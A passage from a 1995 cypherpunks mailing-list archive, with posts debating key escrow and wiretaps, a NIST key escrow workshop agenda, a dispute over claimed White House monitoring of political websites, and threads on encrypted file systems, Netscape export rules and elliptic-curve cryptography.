around all over the place, don't you? Sounds like a recomendation for SFS (Secure File System). It encryppts everything going to the disk. I used an SFS partition for a while. But, I swap between DOS and Linux. Havn't seen SFS for linux yet. Later, Tom From bdavis at thepoint.net Tue Sep 12 14:45:29 1995 From: bdavis at thepoint.net (Brian Davis) Date: Tue, 12 Sep 95 14:45:29 PDT Subject: GAK/weak crypto rationale? In-Reply-To: Message-ID: On Tue, 12 Sep 1995, Andrew Spring wrote: > >intercepts requested and authorized in the past year. As I recall, the > >number was quite small - around 12K [?]. Someone had found this out > >through an FOIA request, perhaps, (my recollection of it is poor). It was > > I think it's about 1200. > > >not a large number, anyway. I must conclude that the actual number of > >intercepts is much, much larger than they are saying, and that they must > >be getting what they perceive to be good intel from all this snooping. > > > > A more cautious conclusion would be would be that the importance (to the > LEA's) of the busts made with crypto is much larger than the numbers > suggest. You could interpret that a lot of ways: I suspect that > high-profile career-enhancing cases are highly dependent on wiretaps. No question. Many high profile public corruption, Mafia, and high-level narcotics trafficking cases are made with wiretaps. In our district, we managed to convict almost 20 people in an investigation of the state legislature, including the now-former Speaker of the House and > 6 other legislators. Bribing lobbyists took hits, etc. Particularly effective were the court-approved video and audio tapes of the Speaker taking a bribe in exchange for certain action on legislation and responding to the bribing party: "Well bless your heart." That has become the office's mantra. I understand the same was true of the South Carolina state legislature investigation (wiretaps). A number of previous investigations of our legislature failed over the past 15 years as the stonewall held. Wiretaps, hidden microphones, and hidden cameras put corrupt politicians (I know - redundant) out of business. I don't doubt that wiretaps may sometimes be abused despite the incredibly onerous review process, but they have positive aspects, too. Not a lawyer on the Net, although I play one in real life. ********************************************************** Flame way! I get treated worse in person every day!! From jim at rand.org Tue Sep 12 14:53:28 1995 From: jim at rand.org (Jim Gillogly) Date: Tue, 12 Sep 95 14:53:28 PDT Subject: Friday (15 Sep) GAK meeting at NIST Message-ID: <199509122153.OAA02242@mycroft.rand.org> I was hoping to attend and enturbulate, but my schedule doesn't quite wrap around it. Here's the schedule and talking paper they sent when I inquired. Jim Gillogly Hevensday, 21 Halimath S.R. 1995, 21:48 ---------------------------------------------------------------------------- WORKSHOP TENTATIVE AGENDA Developing Federal Key Escrow Standards September 15, 1995 Hilton Hotel Gaithersburg, Maryland 9:00 Welcome, Agenda Overview Miles Smid, NIST Goals and Objectives 9:10 Discussion of Goals and Objectives Ray Kammer, Deputy Director, NIST 9:20 Initial Thoughts on Standards Development Miles Smid, NIST 9:30 Industry Perspectives (5-10 min max.) Note: We still have a few slots of 5 min. available. Please let Arlene Carlton (301-975-3240) know if you would like to make a formal presentation. 10:30 Break 10:45 Discussion Technical Considerations 11:00 Identifying Technical Issues Miles Smid, NIST 11:15 Discussion 12:00 Lunch 1:30 Breakout sessions 3:15 Break 3:30 Breakout session reports 4:15 Discussion 4:30 Future Activities (Miles Smid, NIST) 5:00 Close Note: The workshop will be held September 15, 1995 (9:00 a.m. - 5:00 p.m.) at the Gaithersburg Hilton Hotel, 620 Perry Parkway, Gaithersburg, Maryland. The meeting will be open to the public, although seating is limited. Advance registration is requested, please contact Arlene Carlton on 301/975-3240, fax: 301/948-1784 or e-mail: carlton at micf.nist.gov. (9/6/95) --------------------- Developing Federal Key Escrow Encryption Standards Workshop September 15, 1995 Discussion Paper In announcements made on August 17, 1995, the Government stated its intention to work with industry and other interested individuals to develop federal key escrow encryption standards, including those implementable in software. This standard, when developed and approved, will be used by federal agencies (and others, if they so choose) in conjunction with FIPS-approved encryption techniques. The structure of the envisioned standard(s), its technical specificity, goals and objectives, important technical considerations, and issues of process must be addressed in order to move forward. Some of the more technical issues include: - Is a standard interface for the release of keys desirable? - What documentation is required? - How will operational procedures be developed? - How will conformance be validated? - Will security be evaluated? If so, under what criteria and by whom? - How will configuration control be maintained? - Are new FIPS-approved algorithms necessary? - Should escrowing be built into the Public Key Infrastructure? - Is a standard escrow system identification field needed? - Is split knowledge required? - Do systems which permit data to be encrypted for both storage and transmission need to provide for both types of escrow? - Does the government require special features (e.g., two hour access, continuous real-time decryption, etc.)? - Who will draft the standard? Timeframe? Note: These issues will be discussed at the Key Escrow Standards Development Workshop to be held September 15, 1995 (9:00 a.m. - 5:00 p.m.) at the Gaithersburg Hilton Hotel, 620 Perry Parkway, Gaithersburg, Maryland. The meeting will be open to the public, although seating is limited. Advance registration is requested, please contact Arlene Carlton on 301/975-3240, fax: 301/948-1784 or e-mail: carlton at micf.nist.gov. 9/6/95 ---------------------------------------------------------------------------- From bdavis at thepoint.net Tue Sep 12 14:56:35 1995 From: bdavis at thepoint.net (Brian Davis) Date: Tue, 12 Sep 95 14:56:35 PDT Subject: Whitehouse "dissident" web site monitoring? In-Reply-To: <9509121717.AA03226@anon.penet.fi> Message-ID: On Tue, 12 Sep 1995 an215712 at anon.penet.fi wrote: > > - ---------------------------------------------------------- > > WHITE HOUSE MONITORING OF DISSIDENTS ON THE INTERNET > ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^!!! Unbelievable!!! To add to this distressing truth, I have learned that the White House also subscribes to a number of newspapers and periodicals which are reviewed for things of interest to the Administration and to the President. I I I I I I ammmmmmmmmm shocked! Ooops. Dog bites man. And do you really think the White House couldn't hire a couple of net gurus to sniff packets if they wanted to hide their "monitoring"(=reading). EBD > > The National Security Agency presumably can monitor > subversive communication on the Internet without leaving any > trace by "sniffing packets" at traffic nodes. For purely > political purposes, however, the White House may be forced to do > the monitoring in-house, which means that they leave traces > everywhere they go. > > With just a superficial search for such traces, The > Washington Weekly has uncovered intensive monitoring of > "dissident" Internet sites by the White House. > > It turns out that computers from inside the White House have > kept pretty good tabs on information available on Whitewater, > Vince Foster, and Mena at a few key repositories on the World- > Wide Web, a subset of the Internet. > > Just three such sites: "The Washington Weekly, "The > Whitewater Scandal Home Page" and "Whitewater & Vince Foster," > were accessed 128 times by four computers from the Executive > Office of the President between August 28 and August 31. If the > White House is showing a similar interest in other sites on the > World Wide Web, that would amount to a monitoring operation of > considerable magnitude. Tim Brady of the Yahoo! World-Wide Web > index says that his company alone has indexed approximately 725 > political sites. That monitoring effort would be nothing, > however, compared to the effort required to follow all anti- > Clinton discussion on the Usenet, another subset of the Internet. > > The White House did not respond to an inquiry (attached > below) asking for an explanation and asking whether this > constituted "casual browsing." > > Interestingly, the week after the White House snooping of > files, which included a series of articles by J. Orlin Grabbe on > Vince Foster's ties to the NSA, the following little piece > appeared in Newsweek Magazine: > > "Conspiracy theorists perked up when Deborah Gorham told Senate > Whitewater investigators in June that her boss, the late deputy > White House counsel Vince Foster, asked her to put two secret > notebooks from the National Security Agency in a White House > safe. The suggestion that Foster dealt with the NSA sparked > feverish speculation on the Internet that he was involved in > espionage. The reality appears more prosaic. The White House > won't give details, but sources say Foster's files dealt with > legal questions about national emergencies...." > > > Does the White House follow anti-Clinton discussion on Usenet > newsgroups just as closely? The White House posts press releases > to Usenet in collaboration with the Artificial Intelligence Lab > at Massachusetts Institute of Technology. But MIT System > Administrator Bruce Walton says that the White House does not use > the same server for reading netnews. It would be difficult - > although not impossible - to find the server that the White House > uses for reading or receiving netnews and check for traces on > that server. > > Readers may be tempted to post a threat to the President on a > newsgroup just to see if they get a visit from the Secret Service > the next day. That experiment is not advisable. It is a criminal > offense. But Usenet just might be a faster conduit for getting > the attention of the administration than the email address that > the White House has published for the president. > > > > > > Attachment: > > > > THE WASHINGTON WEEKLY > _________________________________________________________________ > > August 31, 1995 > > Virginia M. Terzano > White House Office of the Press Secretary > The White House > > > Dear Ms. Terzano: > > It has come to my attention that several dissident sites on > the World Wide Web have been visited by White House computers > this week. Apparently, all information regarding Whitewater, > Foster, and Mena has been transferred to White House computers. > > Specifically, the sites, > > "Washington Weekly" (http://www.federal.com), > "The Whitewater Scandal Home Page" > (http://www.cs.dartmouth.edu/~crow/whitewater/) > "Whitewater & Vince Foster" > (http://www.cris.com/~dwheeler/n/whitewater/whitewater-index.html) > > have been visited by White House computers ist1.eop.gov, > ist6.eop.gov, ist7.eop.gov, and gatekeeper.eop.gov between August > 28 and August 31, and a total of 128 files have been transferred > to those White House computers. For all sites, this constitutes a > significant increase over previous access by White House > computers. > > In light of this information, I have the following questions: > > (1) Does this constitute "casual browsing" by White House staff, or > is it, in light of the considerable time and effort spent during > regular business hours, part of a monitoring or intelligence operation? > > (2) For what purpose is the information transferred to the White House used? > > (3) Does the White House keep information from these web sites on file, > and does the White House keep a file on the persons responsible for > these web sites? > > (4) Is the April 9 statement by David Lytel of the White House Office of > Science and Technology to Amy Bauer of Copley News Service that the > administration does not monitor anti-Clinton activity on the web still > operative? > > > Thank you very much for your cooperation in this matter. > > Sincerely, > > Marvin Lee > The Washington Weekly > > > > > Copyright (c) 1995 The Washington Weekly (http://www.federal.com) > > > ---------------------------------------------------------------------------- > To find out more about the anon service, send mail to help at anon.penet.fi. > If you reply to this message, your message WILL be *automatically* anonymized > and you are allocated an anon id. Read the help file to prevent this. > Please report any problems, inappropriate use etc. to admin at anon.penet.fi. > Not a lawyer on the Net, although I play one in real life. ********************************************************** Flame way! I get treated worse in person every day!! From Richard.Johnson at Colorado.EDU Tue Sep 12 15:06:04 1995 From: Richard.Johnson at Colorado.EDU (Richard Johnson) Date: Tue, 12 Sep 95 15:06:04 PDT Subject: Leaked NSI PR About $50-Annual-Fee-for-Domain-Name Message-ID: Here's a pointer to a very interesting draft press release, apparently scheduled for release on 18 September 1995. Short version: The article specifies $100 one-time fee for new domain name registrations, and a $50/year annual fee for all .com, .edu, .gov, .net, and .org domains. Long version: > From: rpwhite at best.com (rpwhite) > Newsgroups: best.general,best.announce,best.www,ba.internet,comp.protocols.tcp-ip.domains,talk.bizarre > Subject: INTERNET BEGINS FEE-BASED REGISTRATION > Date: 12 Sep 1995 12:18:18 -0700 > Organization: BEST Internet (415) 964-2378 > Lines: 495 > Approved: dillon at best.com > Message-ID: <434mdq$c3r at shell1.best.com> > NNTP-Posting-Host: shell1.best.com From aleph1 at dfw.net Tue Sep 12 15:13:00 1995 From: aleph1 at dfw.net (Aleph One) Date: Tue, 12 Sep 95 15:13:00 PDT Subject: Scientology tries to break PGP - and (fwd) In-Reply-To: <199509122056.NAA19963@netcom19.netcom.com> Message-ID: In that case you must try CFS or Cryto File Sytem. Not implemented in a partition or in the kernel like SFS but as a user level loopback nfs server. Its quite nice. Aleph One / aleph1 at dfw.net http://underground.org/ On Tue, 12 Sep 1995, Tom Rollins wrote: > Date: Tue, 12 Sep 1995 13:56:18 -0700 (PDT) > From: Tom Rollins > To: cypherpunks at toad.com > Subject: Re: Scientology tries to break PGP - and (fwd) > > > I would just like to point out that, when a LEA comes to you > > to get at the contents of your computer, (s)he is not going to > > patiently wait while your system wipes the offending evidence off your > > hard disk. The first thing they do is make a copy of everything, so > > they can work from the copy. Besides, you do have backup tapes laying > > around all over the place, don't you? > > Sounds like a recomendation for SFS (Secure File System). > It encryppts everything going to the disk. > I used an SFS partition for a while. But, I swap between > DOS and Linux. Havn't seen SFS for linux yet. > > Later, > Tom > > From adwestro at ouray.cudenver.edu Tue Sep 12 15:27:02 1995 From: adwestro at ouray.cudenver.edu (Alan Westrope) Date: Tue, 12 Sep 95 15:27:02 PDT Subject: Denver area meeting, SUNDAY, 9/17, 2 pm Message-ID: -----BEGIN PGP SIGNED MESSAGE----- As usual, we'll congregate at the food court in the basement of the Tivoli, near the confluence of Larimer St., Speer Blvd., and the Auraria Parkway, and perhaps drift off to nearby libraries or restaurants after an hour or two. Email for directions or more info. Alan Westrope __________/|-, (_) \|-' 2.6.2 public key: finger / servers PGP 0xB8359639: D6 89 74 03 77 C8 2D 43 7C CA 6D 57 29 25 69 23 -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: I *swear* I have not used the term 'big-endian' in the last 10 years. iQCVAwUBMFYHkFRRFMq4NZY5AQGuGwQAmOqG0gpZHlUsmQxHcCfA2Hg30LQH9FXN xgz+gZuMWLFDNIZp/5bmodK18B4NpE4AtJH9QhA8kngb11/onVAu8aiw/EFGbTyT yHF2NVN20gGOGAYbeJzpUWHnJhPUB9QYszdwc8K0VvDtYfxq/H8mDfgDiGjNenCG z8ryBpKWYkQ= =cscS -----END PGP SIGNATURE----- From alano at teleport.com Tue Sep 12 15:48:37 1995 From: alano at teleport.com (Alan Olsen) Date: Tue, 12 Sep 95 15:48:37 PDT Subject: Netscape to patch shareware version Message-ID: <199509122248.PAA21902@desiree.teleport.com> At 11:00 PM 9/12/95 +0200, you wrote: >>| Netscape said it received word last week that the State Department had >>| cleared that version for release on the Net, but only within the U.S., >>| owing to current export laws banning the export of encryption schemes >>| stronger than 40 bits. THe company could provide no details by press >>| time on how it would ensure that the 128-bit version wouldn't leak beyond >>| U.S. borders. >> >>Ok, any bet on how long it will take? > >It's already been exported. Evidently, one of those who bought the commercial >version sent it to Europe as soon as it was out. The Netscape "personal edition" was available in Europe on some store shelves soon after it's release. (The PE edition of netscape has the 128 bit encryption.) As for what Netscape will do in this case... They had made plans to release the 128 bit version in a method similar to what MIT uses, but they found that they could actually get people to buy a copy if they kept that one as only available by ordering it. (Who says that people will not pay for encryption?) Now all they need to do is come out with a version with a bigger key. (Hint, hint...) I will keep my personal feelings about Netscape to a minimum here. There are certain things that they do well and there are others they do not. But those problems will continue to be forwarded to Dave Null... Well, on to more profitable things. > >I note the site removed it, however, probably because Netscape Comm. Inc. requested that they do so. Netscape generally objects to anyone else carrying their browser (.edu sites with prior permission excepted). > > > > | Minister of Forced Caffinization in the DNRC | alano at teleport.com | |"The moral PGP Diffie taught Zimmerman unites all| Disclaimer: | | mankind free in one-key-steganography-privacy!" | Ignore the man | | -- PGP 2.6.2 key available on request -- | behind the keyboard.| | http://www.teleport.com/~alano | | From jim at acm.org Tue Sep 12 16:07:16 1995 From: jim at acm.org (Jim Gillogly) Date: Tue, 12 Sep 95 16:07:16 PDT Subject: GAK/weak crypto rationale? In-Reply-To: Message-ID: <199509122307.QAA02486@mycroft.rand.org> > Brian Davis writes: > No question. Many high profile public corruption, Mafia, and high-level... > ...In our district, we managed to convict almost 20 people... > Particularly effective were the court-approved video and audio tapes of... > I don't doubt that wiretaps may sometimes be abused despite the > incredibly onerous review process, but they have positive aspects, too. In how many of these cases did you fail to get the necessary information because of encryption? Has this proportion been changing over the years? Jim Gillogly Hevensday, 21 Halimath S.R. 1995, 23:06 From fc at all.net Tue Sep 12 16:19:43 1995 From: fc at all.net (Dr. Frederick B. Cohen) Date: Tue, 12 Sep 95 16:19:43 PDT Subject: new info-sec mailing list Message-ID: <9509122318.AA13685@all.net> Info-sec heaven is introducing a new mailing list. Unlike many of the Internet's mailing lists, this is not an open forum for people on the Internet to exchange ideas. Rather, it is a monthly mailing used to inform readers of new information that can be found in info-sec heaven. If you would like to be informed of new information, services, search capabilities, protection software, articles, books, and other information that appears in info-sec heaven without having to come in periodically and look for yourself, please let us know by sending email to fc at all.net and we will add you to our monthly list. Thank you for your time. -- -> See: Info-Sec Heaven at URL http://all.net Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236 From nobody at armadillo.com Tue Sep 12 16:22:50 1995 From: nobody at armadillo.com (Anonymous Remailing Service) Date: Tue, 12 Sep 95 16:22:50 PDT Subject: No Subject Message-ID: <199509122323.SAA23651@monad.armadillo.com> E. Brian sed: >Unbelievable!!! To add to this distressing truth, I have learned that >the White House also subscribes to a number of newspapers and periodicals >which are reviewed for things of interest to the Administration and to >the President. I I I I I I ammmmmmmmmm shocked! mebbe tha Slickster just wants to know who orlin's "Deep Throat" is... Keep checkin' them fingerprints, Willie! >Ooops. Dog bites man. >And do you really think the White House couldn't hire a couple of net >gurus to sniff packets if they wanted to hide their "monitoring"(=reading). who sez they dont post, too? heh From hallam at w3.org Tue Sep 12 16:23:36 1995 From: hallam at w3.org (hallam at w3.org) Date: Tue, 12 Sep 95 16:23:36 PDT Subject: Whitehouse "dissident" web site monitoring? In-Reply-To: <9509121717.AA03226@anon.penet.fi> Message-ID: <9509122322.AA22126@zorch.w3.org> Hang on a sec, what is meant to be the conspiracy? I don't see any relationship to cryptography here. The material in question was published very publicaly. If you make a public statement about a person then they have a right to hear it. I see that the message on log file confidentiality is not getting through though. I happen to know that the US government is very interested in hearing the views of its citizens, and also the views of citizens of other countries. They are interested in particular about views relating to the actions of the US government, what the government is doing and what it could do. "anti-president views" are of great importance if it is known why those views are held. In my country we call that listening. I have just spent a couple of days talking with a group of people looking at how we can do that better. There is a considerable barrier to being involved in the political process, perhaps the Web can reduce that barrier. The problem being how to handle the massive amounts of input. > Readers may be tempted to post a threat to the President on a >newsgroup just to see if they get a visit from the Secret Service >the next day. That experiment is not advisable. It is a criminal >offense. DO NOT DO THIS. The secret service is required by law to investigate every single threat. This costs a very considerable amount of money which comes from your taxes. There is no discresion in the matter. Hence the only method of reducing the number of alarms is to arrest people and make an example of them. Unless you want to be the example do not do this. >have been visited by White House computers ist1.eop.gov, >ist6.eop.gov, ist7.eop.gov, and gatekeeper.eop.gov between August >28 and August 31, and a total of 128 files have been transferred I don't know which those machines are, however there are a large number of Web browsers in the Whitehouse and there are a large number of staffers. There is also a Web browser outside the oval office for visitors to use while they are waiting. If you make it your buisness to print nasty material about people then don't be suprized if they read it. The material has probably been picked up by a search engine in any case. There is no conspiracy here unless you are very determined to find one. Given the nature of the article it does not appear that a balanced view of the administration was being sought in any case. I happen to know that Newt Gingrich's staffers and Weld's staffers also surf the Web, are they "monitoring anti-Newt dissidents?", I suspect not. I don't get the impression that our anonymous source has sent a complaint in that direction. I spend a considerable amount of time getting people in power to listen to the net community. I get very pissed off when a bunch of conspiracy nuts try to make out that they have been doing anything wrong when they do. As a matter of ethics I consider information in log files private. This was certainly considered to be the case in the Marty Rimm affair. The posting was clearly designed to intimidate the Whitehouse staffers into not visiting those sites, it was possible that they might have lost their net.access entirely as a result of the complaint. I consider the letter sent to Terzano to be unethical since the staffers had a right to expect their privacy to be preserved. If people want to talk about cryptography and the President we can discuss whether he should put a digital signature on his press releases. I think the use of the word dissident in the message is an insult, both to the dissidents in the Eastern Europe and other places who have suffered genuine persecution and to the democratic institutions and people of the United States. Phill Hallam-Baker Not speaking for anyone else. From perry at piermont.com Tue Sep 12 17:32:40 1995 From: perry at piermont.com (Perry E. Metzger) Date: Tue, 12 Sep 95 17:32:40 PDT Subject: No Subject In-Reply-To: Message-ID: <199509130032.UAA16308@frankenstein.piermont.com> Tom Jones writes: > The ones I've heard about are SKIP, Photurus and ISAKMP(sp?). ISAKMP is really a metaprotocol, and SKIP doesn't fit the IPSP model well -- it never was much of a candidate... .pm From cryptech at Mars.mcs.com Tue Sep 12 17:34:40 1995 From: cryptech at Mars.mcs.com (Mike Rosing) Date: Tue, 12 Sep 95 17:34:40 PDT Subject: Elliptic Curve Public Key Crypto available In-Reply-To: <9509121658.AA00550@ch1d157nwk> Message-ID: On Tue, 12 Sep 1995, Andrew Loewenstern wrote: > What about NeXT's Fast Elliptic Encryption (FEE)? Their research guy, > Richard Crandall, came up with major speedups to elliptic curve encryption. > In fact, there was a simple cryptosystem that shipped as a demo with NeXTSTEP > 2.0. What was most interesting about this system was that it didn't store > any keys anywhere; your public/private key pair was generated _on the fly_ > from your passphrase every time you encrypted or decrypted....on a 25mhz > 68040 too... and it was fast! It wasn't that great of an implementation > (you _really_ need a lot of bits of entropy in that passphrase, and you can't > change your passphrase without changing your PK), but it shows how fast > NeXT's speedups are. And this was in 1990... > > I'm not sure if the speedups are patented, but you could try a literature > search. If it really is fast then it could mean good things for servers that > need to do a lot of enrcyption/decrption for interaction with clients. Yes, the speedups are patented. Their system relied on very specific curves with very specific properties. I purposly avoided coding up their method because of that. Their method is described in patent #5,159,632 dated Oct 27, 1992 and it uses a different equation (supersingular version) than what I implemented. The price is slower speed, but with 100 MHz processors you won't notice. Patience, persistence, truth, Dr. mike From bdavis at thepoint.net Tue Sep 12 17:39:33 1995 From: bdavis at thepoint.net (Brian Davis) Date: Tue, 12 Sep 95 17:39:33 PDT Subject: Digital Fingerprinting In-Reply-To: <9509121745.AA19687@toad.com> Message-ID: On Tue, 12 Sep 1995, Peter Trei wrote: > > Finding the mail mixed in there is evidence that supports the "charge" > > but surely can be rebutted. When I was practicing in a small town c. > > 1984, people would be summoned (sent a paper telling them to show up) to > > court for illegal dumping if their mail was found with other trash, old > > refrigerators, etc., in a creek somewhere. Those charged could always > > put on proof that Billy Bob's garbage service picked up their trash ... > > > The sentence was almost always to go and pick up some multiple of the > > garbage found and take it to the landfill. > > This was Stockbridge, in MA, right :-? No, it was in Western Kentucky with a week or two of a family's garbage and maybe a worn out appliance or two. No garbage pickup provided by the county; private haulers expensive; dropping much at the landfill both inconvenient and "unnecessary" given the availability of hard to find valleys and creeks. EBD > That's what we did, and drove back to the church, had a > thanksgiving dinner that couldn't be beat, went to sleep and didn't > get up until the next morning, when we got a phone call from officer > Obie. Said "Kid, we found your name on an envelope at the bottom of a > half a ton of garbage, and just wanted to know if you had any > information bout it". I said "Yes Sir Officer Obie, I cannot tell a > lie, I put that envelope under that garbage." > (c) Arlo Guthrie > > > > > Peter Trei > Senior Software Engineer > Purveyor Development Team > Process Software Corporation > http://www.process.com > trei at process.com > Not a lawyer on the Net, although I play one in real life. ********************************************************** Flame way! I get treated worse in person every day!! From tcmay at got.net Tue Sep 12 18:03:49 1995 From: tcmay at got.net (Timothy C. May) Date: Tue, 12 Sep 95 18:03:49 PDT Subject: Whitehouse "dissident" web site monitoring? Message-ID: I strongly agree with the views of Phill Hallam-Baker and Brian Davis, and perhaps others who make the same points, that access by the White House to the various Web sites is NO BIG DEAL. I go further: I have no concerns about the NSA reading _this_ list! After all, it's a public list, so all are free to read it. Also, it may be very useful for the Feds to be seeing what we are arguing. We don't believe in "security through obscurity," do we? The notion that we are "safe" if the White House, or (horrors!) Janet Reno herself, are not reading our list or the Web sites on various issues, is the same kind of security the ostrich thinks he has with his head in the sand and his butt in the air. If you want to be unheard by the Feds, and the White House, and the FBI, and GCHQ, and Mossad, etc., then don't post publically. If you want your own access to Web sites kept private, push for the development of Web proxies ("Web remailers"). And so forth. Security is in our own hands, as it should be (and as "complex mathematics" has made it). (In the U.S. and most Western countries--actually, an increasing number of countries, worldwide--it is not easy to prosecute and convict a citizen for mere views expressed, or for reading preferences, etc.. Although I am thought of as a "crypto anarchist," and basically am such a thing, the fact is that there aren't a lot of trials for thoughtcrime in this country. I have some doubts about the circumstances surrounding Danny Casolaro's death, though, so I don't say all is rosy and perfect. I just say that paranoia that the White House or the FBI is reading public items is unwarranted.) --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From mnorton at cavern.uark.edu Tue Sep 12 18:41:32 1995 From: mnorton at cavern.uark.edu (Mac Norton) Date: Tue, 12 Sep 95 18:41:32 PDT Subject: GAK In-Reply-To: <199509121457.KAA28748@panix.com> Message-ID: What's technology got to do with it, in principle? If I write a letter in code, do I have to send the FBI the key, just in case? I don't see anything complicated about this--Director Freeh wants more wiretapping ability than he's got now, and I have no doubt that that expansion of FBI power would be good for national security and law enforcement. So would an FBI camcorder in every room of every house. The question is where to draw the line, and I'd rather let the lines draw themselves, as opposed to having citizens be compelled to draw them. The telephone system, Mr. Freeh's preferred analog, is inherently susceptible to tapping, but what if it were not, and every telephone were required to be equipped with a government tap switch, subuect to warrant, of course? I don't think I'd like that. Would you? MacN On Tue, 12 Sep 1995, Duncan Frissell wrote: > At 09:25 PM 9/3/95 -0400, Brian Davis wrote: > > >I, of course, know of the "dislike" of GAK here. I am curious to know, > >however, if the "dislike" is because government would have access under > >any circumstances or if the primary worry is that government will cheat > >and get access when most would agree that they shouldn't (either by the > >judge "cheating" or a TLA stealing it). > > > If we can deploy technologies to protect our freedom to communicate the way > *we* choose to, then we have the right to do so. Beyond rights, we have the > power to do so --- which is worth even more. From perry at piermont.com Tue Sep 12 18:49:18 1995 From: perry at piermont.com (Perry E. Metzger) Date: Tue, 12 Sep 95 18:49:18 PDT Subject: Whitehouse "dissident" web site monitoring? In-Reply-To: Message-ID: <199509130148.VAA16414@frankenstein.piermont.com> Linda Thompson, American Justice Federation writes: > During the Waco Hearings, Charles Schumer said he'd seen Foster's > missing file and all it had in it was a memorandum about "Linda > Thompson and THAT tape." My, aren't the paranoid nutcases getting self important. Please do not pollute cypherpunks with this crap. Perry From jirib at cs.monash.edu.au Tue Sep 12 18:59:19 1995 From: jirib at cs.monash.edu.au (Jiri Baum) Date: Tue, 12 Sep 95 18:59:19 PDT Subject: Scientology and police visit XS4ALL Amsterdam In-Reply-To: Message-ID: <199509130156.LAA29400@molly.cs.monash.edu.au> -----BEGIN PGP SIGNED MESSAGE----- Hello starrd and Ray Cromwell , cg at bofh.lake.de, cypherpunks at toad.com starrd wrote: > On Thu, 7 Sep 1995, Jiri Baum wrote: ... > > >: : >>: ...[snip] > I gotta read more of this drivil! ROTFL! ROTFL!!! ... I feel I should point out that you have no proof that the text you have attributed to me was in fact posted by me, and in fact you have reason to believe otherwise since I usually PGP-sign my entire post including any signature. > I know this is somewhat off-topic, but I just *had* to say it! Off topic, but I have been publicly accused so I feel I should publicly respond in the same forum. Jiri - -- PGP 463A14D5 -----BEGIN PGP SIGNATURE----- Version: 2.6.2i iQCVAwUBMFY6KixV6mvvBgf5AQELzwP6AsLfSPuRLUyXYXLYqgfyZ4FZD4BVNt14 xYj6HtZwYOgLWnfR344minIcWTNuMbgK6qbeUzWRHEfmcVZFFDHknJi2KPotDb2h VL84dX6qLHpogCyh+bIVt2AvUoAOdYzbIKsC8tIPyaDkDhp7XNUOmXygqllkAuVo El8eN1kuS9U= =lqRY -----END PGP SIGNATURE----- From cryptech at Mars.mcs.com Tue Sep 12 19:19:34 1995 From: cryptech at Mars.mcs.com (Mike Rosing) Date: Tue, 12 Sep 95 19:19:34 PDT Subject: generating hash.curve in eliptic.src Message-ID: Among other comments, it was pointed out that I had not included "hash.curve". To generate this file I did the following main() { POINT point; CURVE curve; init_opt_math(); init_rand(); rand_curv_pnt(point,curve); save_curve("hash.curve",curve,point); close_rand(); } This was done during development and I forgot about it. A simpler patch is to fix an error finding the file with a call to rand_curv_pnt to generate it. Kind of interesting that way for hashing your secret key. If everyone uses a different curve to generate their secret key, access to the machine is necessary to even begin to think about cracking any pass phrase. Don't know if actually adds any security, but it is an interesting concept. As for why I didn't put up a tar file, no particular reason. It's source for a particular machine (MachTen on a Mac) and I figured every C compiler is different so some hacking will be required by anyone interested. Once more bugs are fixed such as the one above, I'll put it up in a more easily compilable form. And thanks for the comments so far. I'll do my best to keep up with them. Patience, persistence, truth, Dr. mike From hallam at w3.org Tue Sep 12 19:27:57 1995 From: hallam at w3.org (hallam at w3.org) Date: Tue, 12 Sep 95 19:27:57 PDT Subject: Whitehouse "dissident" web site monitoring? In-Reply-To: Message-ID: <9509130226.AA22319@zorch.w3.org> >Ooops. Dog bites man. >And do you really think the White House couldn't hire a couple of net >gurus to sniff packets if they wanted to hide their "monitoring"(=reading). Yes, they are far too cheap to hire, they would go off somewhere and smochze the info outa folks. If they ever want an anonymous proxy server they are wellcome to use ours. Seriously folks I'm very pissed about the abuse of log file information. The Whitehouse restrict browsing privilleges to a chosen few. The attempt to make a big deal out of it could have cost someone their job (it didn't in this case). If we are serious about privacy I think we should be very clear that we respect the privacy of Whitehouse staffer and staffers in the Senate and House. I'm not being partisan about this, I have put a lot of effort into getting participation from the right as well as the left. I've just not been very successful in that area. Phill From rsalz at osf.org Tue Sep 12 19:56:29 1995 From: rsalz at osf.org (Rich Salz) Date: Tue, 12 Sep 95 19:56:29 PDT Subject: Whitehouse "dissident" web site monitoring? Message-ID: <9509130255.AA03446@sulphur.osf.org> >Seriously folks I'm very pissed about the abuse of log file information. The What abuse? Is there an expectation of privacy in Web-world, such that all users can honestly expect that a site is compelled to keep its "visitor log" private? Surely not. From mnorton at cavern.uark.edu Tue Sep 12 20:17:24 1995 From: mnorton at cavern.uark.edu (Mac Norton) Date: Tue, 12 Sep 95 20:17:24 PDT Subject: Digital Fingerprinting In-Reply-To: Message-ID: Then, in W.Ky., as in Stockbridge, "You can get anything you want..."? :) MacN On Tue, 12 Sep 1995, Brian Davis wrote: > On Tue, 12 Sep 1995, Peter Trei wrote: > > > > Finding the mail mixed in there is evidence that supports the "charge" > > > but surely can be rebutted. When I was practicing in a small town c. > > > 1984, people would be summoned (sent a paper telling them to show up) to > > > court for illegal dumping if their mail was found with other trash, old > > > refrigerators, etc., in a creek somewhere. Those charged could always > > > put on proof that Billy Bob's garbage service picked up their trash ... > > > > > The sentence was almost always to go and pick up some multiple of the > > > garbage found and take it to the landfill. > > > > This was Stockbridge, in MA, right :-? > > No, it was in Western Kentucky with a week or two of a family's garbage > and maybe a worn out appliance or two. No garbage pickup provided by the > county; private haulers expensive; dropping much at the landfill both > inconvenient and "unnecessary" given the availability of hard to find > valleys and creeks. > > EBD > > > > That's what we did, and drove back to the church, had a > > thanksgiving dinner that couldn't be beat, went to sleep and didn't > > get up until the next morning, when we got a phone call from officer > > Obie. Said "Kid, we found your name on an envelope at the bottom of a > > half a ton of garbage, and just wanted to know if you had any > > information bout it". I said "Yes Sir Officer Obie, I cannot tell a > > lie, I put that envelope under that garbage." > > (c) Arlo Guthrie > > > > > > > > > > Peter Trei > > Senior Software Engineer > > Purveyor Development Team > > Process Software Corporation > > http://www.process.com > > trei at process.com > > > > Not a lawyer on the Net, although I play one in real life. > ********************************************************** > Flame way! I get treated worse in person every day!! > > From bdavis at thepoint.net Tue Sep 12 20:33:54 1995 From: bdavis at thepoint.net (Brian 